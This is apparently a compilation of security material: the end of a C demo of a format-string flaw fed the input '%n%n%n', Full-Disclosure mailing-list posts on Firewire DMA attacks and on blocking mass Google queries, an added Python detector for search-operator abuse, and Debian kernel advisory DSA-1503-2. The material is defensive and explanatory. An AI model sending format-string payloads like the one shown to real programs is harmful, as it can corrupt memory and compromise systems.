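    FILE *out = (type == 'l') ? stdout : (type == 'e') ? stderr : NULL;
    va_list ap;
    int n;

    if (out == NULL)
        return -1;
    va_start(ap, fmt);
    n = vfprintf(out, fmt, ap);
    va_end(ap);
    return n;
}

int main(void)
{
    const char *buf = "%n%n%n";     /* constructed input, as in the advisory */
    char msg[128];

    if (build_unknown_cmd_msg(msg, sizeof msg, buf) < 0)
        return 1;
    log_fmt('l', "directives in message: %zu\n", count_format_directives(msg));
    log_message_safe(msg, 'e');     /* prints the text verbatim */
    return 0;
}
```

Building the original call sites with -Wformat -Wformat-security makes the compiler report each fprintf(stream, log_msg) where the format is not a string literal.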

From doconnor at gsoft.com.au Thu Mar 6 00:57:58 2008
From: doconnor at gsoft.com.au (Daniel O'Connor)
Date: Thu, 6 Mar 2008 11:27:58 +1030
Subject: [Full-disclosure] Firewire Attack on Windows Vista
In-Reply-To: <096A04F511B7FD4995AE55F13824B8332F1E35@contoso>
References: <1204732416.6997.53.camel@b4byl0n>
 <096A04F511B7FD4995AE55F13824B8332F1E35@contoso>
Message-ID: <200803061128.06072.doconnor@gsoft.com.au>

On Thu, 6 Mar 2008, Roger A. Grimes wrote:
> As somewhat indicated in the paper itself, these types of physical
> DMA attacks are possible against any PC-based OS, not just Windows.
> If that's true, why is the paper titled around Windows Vista?
>
> I guess it makes headlines faster. But isn't as important, if not
> more important, to say all PC-based systems have the same underlying
> problem? That it's a broader problem needing a broader solution,
> instead of picking on one OS vendor to get headlines?

Well it IS a new kid on the block, other systems have already had this
problem reported..

It would certainly be more interesting if Vista wasn't vulnerable
though :)

That said, according to the fwohci source in FreeBSD you have to
explicitly enable this feature and the fwohci man page says it is
mandatory for SBP.

It would not be too difficult to disable it by default unless an SBP
device is in use. Even in that case it is apparently possible to limit
the access granted to a particular device (eg only allow it for the
places you expect the device to write to).

--
Daniel O'Connor software and network engineer
for Genesis Software - http://www.gsoft.com.au
"The nice thing about standards is that there
are so many of them to choose from."
  -- Andrew Tanenbaum
GPG Fingerprint - 5596 B766 97C0 0E94 4347 295E E593 DC20 7B3F CE8C
Name: not available Type: application/pgp-signature Size: 187 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080306/eb82752c/attachment.bin From tonnerre.lombard at sygroup.ch Thu Mar 6 07:54:37 2008 From: tonnerre.lombard at sygroup.ch (Tonnerre Lombard) Date: Thu, 6 Mar 2008 08:54:37 +0100 Subject: [Full-disclosure] Firewire Attack on Windows Vista In-Reply-To: <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> Message-ID: <20080306085437.3725ad80@wssyg114.sygroup-int.ch> Salut, Roger, On Wed, 5 Mar 2008 16:30:35 -0500, Roger A. Grimes wrote: > As somewhat indicated in the paper itself, these types of physical > DMA attacks are possible against any PC-based OS, not just Windows. > If that's true, why is the paper titled around Windows Vista? That's very easy: because the specific attack was against Windows Vista's activation mechanism. The deficiencies of Firewire with regard to direct memory access have been known for quite a while now. The purpose of the referenced attack was specific to Windows Vista. It is of course also possible though to steal GnuPG keys from the memory of a Solaris machine, of course, that's in the nature of the beast, but this is not relevant to the specific attack mentioned here. May I also add that I am actually aware of patches from vendors which can render this attack ineffective for most other OSes (Solaris, Linux, etc.) - as far as I know, though, there is no such patch for Windows? That might also be a reason why this attack was created and published in the first place - like I said, the attack vector has been known for ages now. > [Disclaimer: I'm a full-time Microsoft employee.] Hi there. 
;-)

				Tonnerre
-- 
SyGroup GmbH
Tonnerre Lombard

Solutions Systematiques
Tel:+41 61 333 80 33		Güterstrasse 86
Fax:+41 61 383 14 67		4053 Basel
Web:www.sygroup.ch		tonnerre.lombard at sygroup.ch

From v.vitkov at cnsys.bg Thu Mar 6 07:32:23 2008
From: v.vitkov at cnsys.bg (Vladimir Vitkov)
Date: Thu, 6 Mar 2008 09:32:23 +0200
Subject: [Full-disclosure] Goolag Perk and Annoyance
In-Reply-To: <47CEB241.3020604@krr.org>
References: <47CEB241.3020604@krr.org>
Message-ID: <200803060932.26842.v.vitkov@cnsys.bg>

> Within "most" corporate networks, what effective methods can be used,
> from the network's perspective, to block mass Google queries?

Probably you are best with some kind of ratelimiting and/or content
inspection of http traffic. Probably some payload injection in the flow and
blocking the user based on your statistics ...

>
> .te
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/

-- 
BOFH excuse #218:
The UPS doesn't have a battery backup.

-- 
Regards
Vladimir Vitkov
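
[Added example, not part of the original thread or any poster's code: one way to apply the rate-limiting and content-inspection idea from the reply above to proxy logs, flagging clients whose Google search rate or use of search operators exceeds a per-minute limit. The log layout, thresholds and addresses are assumptions, and the sample traffic is constructed.]

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

STAMP = "%Y-%m-%dT%H:%M:%S"
# Heuristic host match: google.com, www.google.co.uk, ... but not notgoogle.com.
GOOGLE_HOST = re.compile(r"(^|\.)google\.[a-z.]{2,6}$")
# Search operators that automated query tools lean on; rare in bulk from people.
OPERATOR = re.compile(
    r"\b(?:allinurl|allintitle|inurl|intitle|intext|filetype|ext|site):", re.I)


def parse_line(line):
    """Return (time, client, query) for a Google search request, else None.

    Assumed log layout (not from the thread): "<time> <client> <method> <url>".
    The proxy must see full URLs, i.e. plain HTTP or TLS interception.
    """
    parts = line.split()
    if len(parts) != 4:
        return None
    stamp, client, _method, url = parts
    try:
        when = datetime.strptime(stamp, STAMP)
        target = urlsplit(url)
        host = (target.hostname or "").lower()
    except ValueError:
        return None  # malformed timestamp or URL
    if not GOOGLE_HOST.search(host) or target.path != "/search":
        return None
    # parse_qs percent-decodes, so "site%3Aexample.com" becomes "site:example.com".
    return when, client, parse_qs(target.query).get("q", [""])[0]


def find_mass_queriers(lines, window=timedelta(seconds=60),
                       max_any=30, max_operator=5):
    """Return {client: (reason, time the limit was first exceeded)}.

    Lines must be in time order. Each client has two sliding windows: one
    over all searches (rate limiting) and one, with a lower limit, over
    searches that carry operators (content inspection). The thresholds are
    illustrative assumptions and need tuning against real traffic.
    """
    recent = defaultdict(lambda: {"operator": deque(), "any": deque()})
    limits = {"operator": max_operator, "any": max_any}
    flagged = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        when, client, query = parsed
        has_operator = bool(OPERATOR.search(query))
        for kind, limit in limits.items():
            times = recent[client][kind]
            if kind == "any" or has_operator:
                times.append(when)
            # Drop requests that have fallen out of the window.
            while times and when - times[0] > window:
                times.popleft()
            if len(times) > limit and client not in flagged:
                flagged[client] = (kind, when)
    return flagged


def build_sample_log():
    """Constructed sample traffic, not real data."""
    base = datetime(2008, 3, 6, 9, 0, 0)
    search = "http://www.google.com/search?q="
    rows = []

    def add(offset, client, url):
        when = base + timedelta(seconds=offset)
        rows.append(f"{when.strftime(STAMP)} {client} GET {url}")

    for i in range(8):    # 10.0.0.23: burst of operator queries, 2 s apart
        add(2 * i, "10.0.0.23",
            f"{search}site%3Aexample.com+filetype%3Apdf&start={i * 10}")
    for i in range(40):   # 10.0.0.41: 40 plain queries, 1 s apart
        add(120 + i, "10.0.0.41", f"{search}weather+{i}")
    # 10.0.0.7: a person, three searches in ten minutes, one with an operator
    for offset, q in ((0, "debian+dsa"), (300, "site%3Adebian.org+kernel"),
                      (600, "firewire+dma")):
        add(offset, "10.0.0.7", search + q)
    add(5, "10.0.0.9", "http://www.example.org/index.html")  # not a search
    rows.append("not-a-time 10.0.0.9 GET " + search + "x")   # malformed line
    return sorted(rows)


if __name__ == "__main__":
    for client, (reason, when) in find_mass_queriers(build_sample_log()).items():
        print(f"{client} exceeded the '{reason}' limit at {when.strftime(STAMP)}")
```

[The flagged set would feed whatever blocking or throttling the proxy supports; the single operator query from 10.0.0.7 stays below both limits.]
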

From dannf at debian.org Thu Mar 6 07:47:54 2008
From: dannf at debian.org (dann frazier)
Date: Thu, 6 Mar 2008 00:47:54 -0700
Subject: [Full-disclosure] [SECURITY] [DSA 1503-2] New Linux kernel 2.4.27 packages fix several issues
Message-ID: <20080306074754.GB18766@ldl.fc.hp.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1503-2                security at debian.org
http://www.debian.org/security/                             dann frazier
March 6, 2008                         http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : kernel-source-2.4.27 (2.4.27-10sarge7)
Vulnerability  : several
Problem-Type   : local/remote
Debian-specific: no
CVE ID         : CVE-2004-2731 CVE-2006-4814 CVE-2006-5753 CVE-2006-5823
                 CVE-2006-6053 CVE-2006-6054 CVE-2006-6106 CVE-2007-1353
                 CVE-2007-1592 CVE-2007-2172 CVE-2007-2525 CVE-2007-3848
                 CVE-2007-4308 CVE-2007-4311 CVE-2007-5093 CVE-2007-6063
                 CVE-2007-6151 CVE-2007-6206 CVE-2007-6694 CVE-2008-0007

Several local and remote vulnerabilities have been discovered in the Linux
kernel that may lead to a denial of service or the execution of arbitrary
code.

The package versions referenced in the initial DSA-1503 advisory introduced
a regression that can cause hangs on systems that make use of the ext2
filesystem. The regression has been resolved in the package versions
referenced by this updated advisory.

The Common Vulnerabilities and Exposures project identifies the following
problems:

CVE-2004-2731

    infamous41md reported multiple integer overflows in the Sbus PROM
    driver that would allow for a DoS (Denial of Service) attack by a
    local user, and possibly the execution of arbitrary code.

CVE-2006-4814

    Doug Chapman discovered a potential local DoS (deadlock) in the mincore
    function caused by improper lock handling.

CVE-2006-5753

    Eric Sandeen provided a fix for a local memory corruption vulnerability
    resulting from a misinterpretation of return values when operating on
    inodes which have been marked bad.

CVE-2006-5823

    LMH reported a potential local DoS which could be exploited by a
    malicious user with the privileges to mount and read a corrupted
    cramfs filesystem.

CVE-2006-6053

    LMH reported a potential local DoS which could be exploited by a
    malicious user with the privileges to mount and read a corrupted
    ext3 filesystem.

CVE-2006-6054

    LMH reported a potential local DoS which could be exploited by a
    malicious user with the privileges to mount and read a corrupted
    ext2 filesystem.

CVE-2006-6106

    Marcel Holtman discovered multiple buffer overflows in the Bluetooth
    subsystem which can be used to trigger a remote DoS (crash) and
    potentially execute arbitrary code.

CVE-2007-1353

    Ilja van Sprundel discovered that kernel memory could be leaked via the
    Bluetooth setsockopt call due to an uninitialized stack buffer. This
    could be used by local attackers to read the contents of sensitive
    kernel memory.

CVE-2007-1592

    Masayuki Nakagawa discovered that flow labels were inadvertently
    being shared between listening sockets and child sockets. This defect
    can be exploited by local users to cause a DoS (Oops).

CVE-2007-2172

    Thomas Graf reported a typo in the DECnet protocol handler that could
    be used by a local attacker to overrun an array via crafted packets,
    potentially resulting in a Denial of Service (system crash).
    A similar issue exists in the IPV4 protocol handler and will be fixed
    in a subsequent update.

CVE-2007-2525

    Florian Zumbiehl discovered a memory leak in the PPPOE subsystem caused
    by releasing a socket before PPPIOCGCHAN is called upon it. This could
    be used by a local user to DoS a system by consuming all available
    memory.

CVE-2007-3848

    Wojciech Purczynski discovered that pdeath_signal was not being reset
    properly under certain conditions which may allow local users to gain
    privileges by sending arbitrary signals to suid binaries.

CVE-2007-4308

    Alan Cox reported an issue in the aacraid driver that allows
    unprivileged local users to make ioctl calls which should be restricted
    to admin privileges.

CVE-2007-4311

    PaX team discovered an issue in the random driver where a defect in the
    reseeding code leads to a reduction in entropy.

CVE-2007-5093

    Alex Smith discovered an issue with the pwc driver for certain webcam
    devices. If the device is removed while a userspace application has it
    open, the driver will wait for userspace to close the device, resulting
    in a blocked USB subsystem. This issue is of low security impact as it
    requires the attacker to either have physical access to the system or
    to convince a user with local access to remove the device on their
    behalf.

CVE-2007-6063

    Venustech AD-LAB discovered a buffer overflow in the isdn ioctl
    handling, exploitable by a local user.

CVE-2007-6151

    ADLAB discovered a possible memory overrun in the ISDN subsystem that
    may permit a local user to overwrite kernel memory by issuing
    ioctls with unterminated data.

CVE-2007-6206

    Blake Frantz discovered that when a core file owned by a non-root user
    exists, and a root-owned process dumps core over it, the core file
    retains its original ownership. This could be used by a local user to
    gain access to sensitive information.

CVE-2007-6694

    Cyrill Gorcunov reported a NULL pointer dereference in code specific
    to the CHRP PowerPC platforms. Local users could exploit this issue
    to achieve a Denial of Service (DoS).

CVE-2008-0007

    Nick Piggin of SuSE discovered a number of issues in subsystems which
    register a fault handler for memory mapped areas. This issue can be
    exploited by local users to achieve a Denial of Service (DoS) and
    possibly execute arbitrary code.

The following matrix lists additional packages that were rebuilt for
compatibility with or to take advantage of this update:

                                 Debian 3.1 (sarge)
     alsa-modules-i386           1.0.8+2sarge2
     fai-kernels                 1.9.1sarge9
     kernel-image-2.4.27-arm     2.4.27-2sarge7
     kernel-image-2.4.27-m68k    2.4.27-3sarge7
     kernel-image-speakup-i386   2.4.27-1.1sarge6
     kernel-image-2.4.27-alpha   2.4.27-10sarge7
     kernel-image-2.4.27-s390    2.4.27-2sarge7
     kernel-image-2.4.27-sparc   2.4.27-9sarge7
     kernel-image-2.4.27-i386    2.4.27-10sarge7
     kernel-image-2.4.27-ia64    2.4.27-10sarge7
     kernel-patch-2.4.27-mips    2.4.27-10.sarge4.040815-4
     kernel-patch-powerpc-2.4.27 2.4.27-10sarge7
     kernel-latest-2.4-alpha     101sarge3
     kernel-latest-2.4-i386      101sarge2
     kernel-latest-2.4-s390      2.4.27-1sarge2
     kernel-latest-2.4-sparc     42sarge3
     i2c                         1:2.9.1-1sarge2
     lm-sensors                  1:2.9.1-1sarge4
     mindi-kernel                2.4.27-2sarge6
     pcmcia-modules-2.4.27-i386  3.2.5+2sarge2
     hostap-modules-i386         1:0.3.7-1sarge3
     systemimager                3.2.3-6sarge6

We recommend that you upgrade your kernel package immediately and reboot
the machine. If you have built a custom kernel from the kernel source
package, you will need to rebuild to take advantage of these fixes.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

Note that this update changes various package names due to ABI changes.
You must therefore have the corresponding upgrade-assist metapackage(s)
installed for your upgrades to automatically take place. These packages
have names with the prefix 'kernel-image-2.4-'.
For a full list of the metapackages available for your architecture,
run the following command on the target Debian 3.1 system:

  apt-cache search kernel-image-2.4-

Any 3rd party modules that have been built and installed for your system
will need to be rebuilt and installed for compatibility with the new ABI.

Debian 3.1 (oldstable)
- ----------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64,
m68k, mips, mipsel, powerpc, s390 and sparc.
http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-headers-2.4-k7_101sarge2_i386.deb Size/MD5 checksum: 2228 e49a7f6a1ebf9217ca427fe98bef9ef5 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-headers-2.4-k7-smp_101sarge2_i386.deb Size/MD5 checksum: 2290 3656872aeedf815c3fb157e27a35aeed http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-386_101sarge2_i386.deb Size/MD5 checksum: 2180 d493e7439c2ac668aa8af8e300476a32 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-586tsc_101sarge2_i386.deb Size/MD5 checksum: 2200 99dc53e529fe3780b87ebea56bc3a9e2 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-686_101sarge2_i386.deb Size/MD5 checksum: 2208 ecaf8a85eeab65f53b7cfc369e872741 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-686-smp_101sarge2_i386.deb Size/MD5 checksum: 2274 a0ae0ea68ab8e0ad0b5c7ce84c648205 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-k6_101sarge2_i386.deb Size/MD5 checksum: 2192 ed4d6c14605c790b4b1514479cf2a4dc http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-k7_101sarge2_i386.deb Size/MD5 checksum: 2190 de7c785f29cfac9758d90c48c8eb5bca http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-image-2.4-k7-smp_101sarge2_i386.deb Size/MD5 checksum: 2258 e07b801edb75bff62ff274577b74e41f http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-386_101sarge2_i386.deb Size/MD5 checksum: 2200 8b295e8d54d56803114aca936edb9b3b http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-586tsc_101sarge2_i386.deb Size/MD5 checksum: 2218 6c564fa8fbe8eb3fed7547f363a5f3d3 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-686_101sarge2_i386.deb Size/MD5 
checksum: 2232 ca5ab5706cf7092c57853b73611ccf37 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-686-smp_101sarge2_i386.deb Size/MD5 checksum: 2296 cf0ed26b54117f21c940785dd5cd6361 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-k6_101sarge2_i386.deb Size/MD5 checksum: 2212 c596e89ceb9694a47531542a81618fe8 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-k7_101sarge2_i386.deb Size/MD5 checksum: 2214 cceb0bf335f590d45b56060150be29e6 http://security.debian.org/pool/updates/main/k/kernel-latest-2.4-i386/kernel-pcmcia-modules-2.4-k7-smp_101sarge2_i386.deb Size/MD5 checksum: 2278 5747a8a13621d34006e02e12ddecfdf5 http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-386_2.9.1-1sarge1_i386.deb Size/MD5 checksum: 77860 2412ecaf415f28cedf1594fc5853a59d http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-586tsc_2.9.1-1sarge1_i386.deb Size/MD5 checksum: 77604 c427abcb6f60c5bf1ac10bc19a65a8b8 http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-686_2.9.1-1sarge1_i386.deb Size/MD5 checksum: 77592 9655842dd75143b38d9591c05c069ac7 http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-686-smp_2.9.1-1sarge1_i386.deb Size/MD5 checksum: 77674 f068190e67295066533fb3fff111c814 http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-k6_2.9.1-1sarge1_i386.deb Size/MD5 checksum: 77586 7a73742b7405143708835f3932f9fa70 http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-k7_2.9.1-1sarge1_i386.deb Size/MD5 checksum: 77678 0a7beec37cd1bf7ec8f1731ae9d6bb9a http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-3-k7-smp_2.9.1-1sarge1_i386.deb Size/MD5 checksum: 77734 5e4b8007c196b17ee41776406b0b8230 http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-4-386_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 77904 8e0633c48d4a196eb7d750f75bd7068a 
http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-4-586tsc_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 77644 e74884dab42407313589891ff9bab2ec http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-4-686_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 77634 8fd76652c4e0c63f65a06a596306f7e2 http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-4-686-smp_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 77702 c33cd973e0b5f4426e1ff15c2b07bb93 http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-4-k6_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 77642 de16e1b5ef4844c9b3619c6d0866a06c http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-4-k7_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 77702 fec475b02fa1569acc7a2fd254736c89 http://security.debian.org/pool/updates/main/i/i2c/i2c-2.4.27-4-k7-smp_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 77762 7cd84fb3f7ccac997edf9ad814f596fc http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors-dev_2.9.1-1sarge4_i386.deb Size/MD5 checksum: 94012 2f7dd855a2776ace2161f61c9da880d4 http://security.debian.org/pool/updates/main/l/lm-sensors/libsensors3_2.9.1-1sarge4_i386.deb Size/MD5 checksum: 77984 62558920315cbde876f88380f87a577d http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors_2.9.1-1sarge4_i386.deb Size/MD5 checksum: 474474 1e8df851476f1d44b88888c9c67ea104 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-2-386_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 258638 9dab2f0c6ca40bb6b1fa648c72dea266 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-2-586tsc_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 258646 27ec0369b7e5710cfa9b8a2f6dc7f976 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-2-686_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 258638 7b59494c8c7e836392ec8d29832a37f7 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-2-686-smp_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 259220 
1f84862f63d4b84ca52d3b0188eae27f http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-2-k6_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 258658 f44895c10b0a2a66f9f8fc2fc1c08945 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-2-k7_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 258950 fc63b5a3190378d192810b865db159d7 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-2-k7-smp_2.9.1-1sarge2_i386.deb Size/MD5 checksum: 259496 acbd3d286c9f83c33075207a32297bfe http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-386_2.9.1-1sarge3_i386.deb Size/MD5 checksum: 258984 1e42dac94e18a442204e159252730d5e http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-586tsc_2.9.1-1sarge3_i386.deb Size/MD5 checksum: 258980 cf019b62e65a17b0ed20e149faa44559 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-686_2.9.1-1sarge3_i386.deb Size/MD5 checksum: 258980 ed75fb59949e2364abfc9459a4832fb3 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-686-smp_2.9.1-1sarge3_i386.deb Size/MD5 checksum: 259572 9505af261ada93ee26c66a3fb0d7d82e http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-k6_2.9.1-1sarge3_i386.deb Size/MD5 checksum: 258984 f0ca8379fd4fe3e7bd07480630d01b05 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-k7_2.9.1-1sarge3_i386.deb Size/MD5 checksum: 259296 a1674fac85b1dc7aaf4e43099bf6de5c http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-3-k7-smp_2.9.1-1sarge3_i386.deb Size/MD5 checksum: 259850 b623d22abc6f054d77b7a30917f08009 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-4-386_2.9.1-1sarge4_i386.deb Size/MD5 checksum: 33496 dc6d281fab6c1ab610e419758fd7b895 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-4-586tsc_2.9.1-1sarge4_i386.deb Size/MD5 checksum: 33506 
b8318c2a64dfc2ed3a6997c958d2d4a8 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-4-686_2.9.1-1sarge4_i386.deb Size/MD5 checksum: 33492 869083538e79481e56094549c5321cd0 http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-4-686-smp_2.9.1-1sarge4_i386.deb Size/MD5 checksum: 33504 4683e862b99aee94cce49c7e24f4ca8d http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-4-k6_2.9.1-1sarge4_i386.deb Size/MD5 checksum: 33488 b11e22c02586f81d1ce395ae1244428e http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-4-k7_2.9.1-1sarge4_i386.deb Size/MD5 checksum: 33488 b83277fd8366c6120159be2d61c219cc http://security.debian.org/pool/updates/main/l/lm-sensors/lm-sensors-2.4.27-4-k7-smp_2.9.1-1sarge4_i386.deb Size/MD5 checksum: 33500 84fe5e6f5efe32f98d65732bbfe658ab http://security.debian.org/pool/updates/main/l/lm-sensors/sensord_2.9.1-1sarge4_i386.deb Size/MD5 checksum: 56474 1f0f3fa67108dbde771d44446870feb1 http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-386_3.2.5+2sarge1_i386.deb Size/MD5 checksum: 477610 61f0e8d1bd3dcbf8447a15f3986710ce http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-586tsc_3.2.5+2sarge1_i386.deb Size/MD5 checksum: 477644 302afa94885da8c4f143b8f5aa3476b0 http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-686_3.2.5+2sarge1_i386.deb Size/MD5 checksum: 477608 0dfded776cb25f87885f3e2cd54139fb http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-686-smp_3.2.5+2sarge1_i386.deb Size/MD5 checksum: 484192 c46d1f7e98b6b3e625158ddaca907951 http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-k6_3.2.5+2sarge1_i386.deb Size/MD5 checksum: 477594 429eb2dd9bec9b005332f8025849f378 
http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-k7_3.2.5+2sarge1_i386.deb Size/MD5 checksum: 477580 24ef30a122508783dc22e87a43923e45 http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-3-k7-smp_3.2.5+2sarge1_i386.deb Size/MD5 checksum: 484198 53b2e26c3a6892fe41301e31a8e91701 http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-4-386_3.2.5+2sarge2_i386.deb Size/MD5 checksum: 477778 b11e7c242050e16293ad1163f60770cb http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-4-586tsc_3.2.5+2sarge2_i386.deb Size/MD5 checksum: 477780 65991feae9a3464324fb4fd9a380ef00 http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-4-686_3.2.5+2sarge2_i386.deb Size/MD5 checksum: 477742 b5fcc0041e57a89f2497a94934ab051f http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-4-686-smp_3.2.5+2sarge2_i386.deb Size/MD5 checksum: 484382 3ce4020ba4761da02bf838277169b514 http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-4-k6_3.2.5+2sarge2_i386.deb Size/MD5 checksum: 477686 7b9b7b5442441dc35b0d17f785dfce87 http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-4-k7_3.2.5+2sarge2_i386.deb Size/MD5 checksum: 477716 568d8b1052dbaff75b1d08e75b503dc9 http://security.debian.org/pool/updates/main/p/pcmcia-modules-2.4.27-i386/pcmcia-modules-2.4.27-4-k7-smp_3.2.5+2sarge2_i386.deb Size/MD5 checksum: 484410 1b0e0136ac477ad58a991da10fef9275 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-3-386_0.3.7-1sarge2_i386.deb Size/MD5 checksum: 140588 4d3d9c96e4566ea0ae5b8ce33892b9f5 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-3-586tsc_0.3.7-1sarge2_i386.deb Size/MD5 checksum: 153216 
ec1de04dfe524ed566c9168317c7f96d http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-3-686_0.3.7-1sarge2_i386.deb Size/MD5 checksum: 156142 d3d7ccde57a411d1e57fd606dac627fb http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-3-686-smp_0.3.7-1sarge2_i386.deb Size/MD5 checksum: 160348 3f0273700f3be9fa5430046ba227dd91 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-3-k6_0.3.7-1sarge2_i386.deb Size/MD5 checksum: 149216 69c40d1ebb04a5ceca0374d28ff6faa2 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-3-k7_0.3.7-1sarge2_i386.deb Size/MD5 checksum: 154834 49bca7c096574c6c0dbfe44db03c2cd0 http://security.debian.org/pool/updates/main/h/hostap-modules-i386/hostap-modules-2.4.27-3-k7-smp_0.3.7-1sarge2_i386.deb Size/MD5 checksum: 158768 d31bb7bcec9ea2d123df2d9d2fc3ccff 